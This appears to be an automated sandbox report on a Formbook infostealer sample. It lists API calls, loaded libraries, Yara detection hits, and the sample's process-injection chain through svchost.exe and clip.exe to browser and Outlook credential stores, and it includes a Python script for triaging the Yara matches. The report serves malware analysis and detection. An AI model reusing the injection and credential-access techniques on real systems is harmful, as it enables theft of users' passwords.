Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7571
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DD5B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_031095C3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FF43F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03031460
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFB76
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305FB80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B5BF0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0307DBF9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFA49
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7A46
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B3A6C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030DDAAC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03085AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030E1AA3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030EDAC6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030D5910
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03049950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305B950
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030AD800
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030438E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFF09
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03041F92
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFFB1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03003FD2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03003FD5
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03049EB0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03043D40
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F1D5A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030F7D73
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0305FDC0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030B9C32
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_030FFCF2
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D3DD5A
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D482A3
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D3FB10
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D3FB19
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D5E889
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D46489
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Code function: 6_2_02D3FD39
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03075130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 030AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 0302B970 appears 280 times
Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 03087E54 appears 111 times
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: String function: 0081EC2F appears 68 times
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: String function: 00826AC0 appears 42 times
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: String function: 0082F8A0 appears 35 times
Source: s7Okni1gfE.exe, 00000000.00000003.1476525427.0000000003A7D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs s7Okni1gfE.exe
Source: s7Okni1gfE.exe, 00000000.00000003.1477404707.00000000038D3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs s7Okni1gfE.exe
Source: s7Okni1gfE.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2714904794.0000000002920000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.2715513437.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1960347440.0000000002B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1960938102.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.2718155143.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
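The ten Yara hits above are one rule firing on memory of four sandboxed processes (indices 2, 6, 7 and 8), most of them in regions mapped execute+write. The parser below is an added example, not Joe Sandbox or Elastic code: it reads "Matched rule" lines in the layout used on this page, splits the rule metadata without breaking on the comma inside `scan_context = file, memory`, and collapses the hits per process and base address. The field order of the `.sdmp` dump names (process index, dump index, sequence number, base address, page protection) is an assumption inferred from the names on this page, not vendor documentation; the protection values are decoded with the standard `PAGE_*` constants from winnt.h. The sample lines are constructed from three of the hits listed above.

```python
import re
from collections import defaultdict

# Windows page-protection constants (winnt.h), used to decode the protection field of a dump name.
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

# Assumed dump-name layout (inferred from the names on this page, not vendor documentation):
# <process index>.<dump index>.<sequence>.<base address>.<protection>. ...
SDMP_RE = re.compile(r"^([0-9A-F]{8})\.([0-9A-F]{8})\.\d+\.([0-9A-F]{16})\.([0-9A-F]{8})\.", re.I)
# Unpacked-PE names: <process index>.<dump index>.<image>.<base>.<n>.[raw.]unpack
UNPACK_RE = re.compile(r"^(\d+)\.\d+\.(.+?)\.([0-9A-F]+)\.\d+\.(?:raw\.)?unpack$", re.I)
LINE_RE = re.compile(r"^Source: (.+?), type: (\w+) \| Matched rule: (\S+) (.*)$")
# Rule metadata is "key = value" pairs joined by ", ", but a value may itself contain ", "
# (scan_context = file, memory), so only split where the next "key = " begins.
META_RE = re.compile(r"(\w+) = (.*?)(?=, \w+ = |$)")

SAMPLE_LINES = [  # constructed from three hits in this report
    "Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23",
    "Source: 00000008.00000002.2717205821.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23",
    "Source: 00000007.00000002.2717771387.0000000004800000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23",
    "Source: 00000002.00000002.1959958040.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23",
]

def parse_match_line(line):
    """One 'Matched rule' line -> dict with rule, type, metadata, process index, base and protection."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    source, kind, rule, meta = m.groups()
    rec = {"rule": rule, "type": kind, "meta": dict(META_RE.findall(meta)), "protect": None}
    if kind == "MEMORY":
        s = SDMP_RE.match(source)
        if not s:
            return None
        proc, _dump, base, prot = s.groups()
        rec.update(process=int(proc, 16), base=int(base, 16),
                   protect=PAGE_PROTECT.get(int(prot, 16), hex(int(prot, 16))))
    else:
        u = UNPACK_RE.match(source)
        if not u:
            return None
        proc, image, base = u.groups()
        rec.update(process=int(proc), image=image, base=int(base, 16))
    return rec

def summarize(lines):
    """Collapse repeated hits to one record per (process index, base address)."""
    by_proc = defaultdict(dict)
    for line in lines:
        rec = parse_match_line(line)
        if rec:
            by_proc[rec["process"]][rec["base"]] = rec
    return dict(by_proc)

def rwx_hits(lines):
    """Regions matched while mapped execute+write: where an unpacked payload normally sits."""
    return [(r["process"], hex(r["base"])) for p in summarize(lines).values()
            for r in p.values() if r["protect"] == "PAGE_EXECUTE_READWRITE"]

if __name__ == "__main__":
    for proc, regions in sorted(summarize(SAMPLE_LINES).items()):
        for base, rec in sorted(regions.items()):
            print(f"process {proc}: {rec['rule']} at {base:#x} ({rec['protect'] or rec['type']})")
    print("RWX regions:", rwx_hits(SAMPLE_LINES))
```

Collapsing by (process, base) is what turns the page's ten lines into the triage statement a report reader wants: process 2 (the hollowed svchost.exe) has the payload at its image base 0x400000, and the same rule fires in processes 6, 7 and 8, which is the injection chain into WNGaDiurNI.exe and clip.exe visible further down.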
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/3@5/4
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0084CE7A GetLastError,FormatMessageW
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0083AB84 AdjustTokenPrivileges,CloseHandle
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0083B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0084E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00846532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0085C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0080406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | File created: C:\Users\user\AppData\Local\Temp\aut4C01.tmp
Source: s7Okni1gfE.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: clip.exe, 00000007.00000003.2150365691.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2715641135.0000000003020000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2715641135.0000000002FF3000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2715641135.0000000002FFE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: s7Okni1gfE.exe | ReversingLabs: Detection: 73%
Source: unknown | Process created: C:\Users\user\Desktop\s7Okni1gfE.exe "C:\Users\user\Desktop\s7Okni1gfE.exe"
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\s7Okni1gfE.exe"
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\clip.exe | Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Section loaded: wininet.dll
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Section loaded: mswsock.dll
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\VFEnTIqdxoPLQMpedaWkbDHwMhQJAtjMHViLFByrHORVEofjn\WNGaDiurNI.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\clip.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
Source: C:\Windows\SysWOW64\clip.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: s7Okni1gfE.exe | Static file information: File size 1226752 > 1048576
Source: s7Okni1gfE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: s7Okni1gfE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: s7Okni1gfE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: s7Okni1gfE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: s7Okni1gfE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: s7Okni1gfE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: s7Okni1gfE.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: WNGaDiurNI.exe, 00000006.00000000.1885629336.00000000007FE000.00000002.00000001.01000000.00000005.sdmp, WNGaDiurNI.exe, 00000008.00000002.2714957354.00000000007FE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: s7Okni1gfE.exe, 00000000.00000003.1471551879.0000000003950000.00000004.00001000.00020000.00000000.sdmp, s7Okni1gfE.exe, 00000000.00000003.1481387538.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1867213112.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1869054817.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1962366849.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1959840687.0000000004806000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: s7Okni1gfE.exe, 00000000.00000003.1471551879.0000000003950000.00000004.00001000.00020000.00000000.sdmp, s7Okni1gfE.exe, 00000000.00000003.1481387538.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000003.1867213112.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.000000000319E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960456440.0000000003000000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1869054817.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1962366849.00000000049B8000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000003.1959840687.0000000004806000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2718534138.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: clip.pdb source: svchost.exe, 00000002.00000003.1928526995.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960250911.0000000000800000.00000004.00000020.00020000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2716834616.0000000000D18000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2721152955.000000000518C000.00000004.10000000.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000000.2034752534.0000000002FFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2264337034.0000000036D0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: clip.exe, 00000007.00000002.2715641135.0000000002F75000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000007.00000002.2721152955.000000000518C000.00000004.10000000.00040000.00000000.sdmp, WNGaDiurNI.exe, 00000008.00000000.2034752534.0000000002FFC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000A.00000002.2264337034.0000000036D0C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: clip.pdbGCTL source: svchost.exe, 00000002.00000003.1928526995.000000000081A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1960250911.0000000000800000.00000004.00000020.00020000.00000000.sdmp, WNGaDiurNI.exe, 00000006.00000002.2716834616.0000000000D18000.00000004.00000020.00020000.00000000.sdmp
Source: s7Okni1gfE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: s7Okni1gfE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: s7Okni1gfE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: s7Okni1gfE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: s7Okni1gfE.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_0081E01E LoadLibraryA,GetProcAddress
Source: C:\Users\user\Desktop\s7Okni1gfE.exe | Code function: 0_2_00826B05 push ecx; ret 0_2_00826B18
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0040205A push esi; retf 2_2_00402076
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041405F push ds; ret 2_2_0041408A
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00402026 push ecx; retf 2_2_0040202D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_00401888 pushfd ; ret 2_2_004018D6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0041409F push ds; ret 2_2_0041408A
